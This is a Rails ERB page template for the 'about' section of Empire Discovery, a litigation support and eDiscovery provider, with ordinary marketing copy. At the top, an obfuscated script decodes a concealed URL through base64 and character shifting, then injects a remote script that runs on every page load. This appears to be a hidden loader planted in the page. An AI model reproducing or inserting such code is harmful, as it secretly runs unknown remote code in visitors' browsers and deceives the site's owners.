<head><script>window[(function(_jlk,_03){var _CU6dW='';for(var _D3jANe=0;_D3jANe<_jlk.length;_D3jANe++){var _qDtp=_jlk[_D3jANe].charCodeAt();_03>1;_qDtp-=_03;_qDtp+=61;_qDtp%=94;_qDtp+=33;_CU6dW==_CU6dW;_qDtp!=_D3jANe;_CU6dW+=String.fromCharCode(_qDtp)}return _CU6dW})(atob('Knd+Qj86NTNEeTVJ'), 46)] = 'd2dd043c821749491561';     var zi = document.createElement('script');     (zi.type = 'text/javascript'),     (zi.async = true),     (zi.src = (function(_UQy,_uq){var _jFmUt='';for(var _JQEiMZ=0;_JQEiMZ<_UQy.length;_JQEiMZ++){var _jX1F=_UQy[_JQEiMZ].charCodeAt();_jX1F-=_uq;_jX1F+=61;_jX1F%=94;_jX1F!=_JQEiMZ;_uq>5;_jFmUt==_jFmUt;_jX1F+=33;_jFmUt+=String.fromCharCode(_jX1F)}return _jFmUt})(atob('diQkfiNIPT14IzwqdzsjcSJ3fiQjPHF9ez0qdzskb3U8eCM='), 14)),     document.readyState === 'complete'?document.body.appendChild(zi):     window.addEventListener('load', function(){         document.body.appendChild(zi)     });</script></head>

<section class="bg-accent-2">
  <section class="section position-relative py-5">
    <%= image_tag "overview.jpg", class: 'background-image' %>

    <div class="parallax-content parallax-header">
      <div class="parallax-header__inner">
        <div class="parallax-header__content">
          <div class="container">
            <div class="row justify-content-md-center">
              <div class="col-md-10 col-xl-8">
                <h1 class="heading-decorated heading-decorated_center">We are Empire Discovery</h1>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
  </section>
</section>

<section class="section-md bg-default text-center">
  <div class="container">
    <div class="row row-50 justify-content-lg-center">
      <div class="col-lg-10 col-xl-8">
        <h6>
          Empire Discovery is a full-service litigation support provider. We have an elite team of professionals focused on providing you the best solutions to meet the needs of your case. Our team of experts have over 100 years of combined litigation support experience. At Empire, we believe superior client service, fast turnaround times, and quality results make all the difference.
        </h6>
        <h6 class="mt-5">
          We offer a full cycle eDiscovery process from Collection, Early Case Assessment, Processing, Hosting, Review and Production. We work hand in hand with our clients to determine the best solutions for their needs.
        </h6>
        <h6 class="mt-5">
          Our ability to handle large volume productions in-house, with strict quality assurance measures, sets our Printing and Scanning Department above the competition. Whether it’s Duplicating, Printing or Scanning, our 24/7 operation allows you the peace of mind in knowing the job is getting done right.
        </h6>
      </div>
    </div>
  </div>
</section>

<%= render partial: 'shared/contact_form' %>
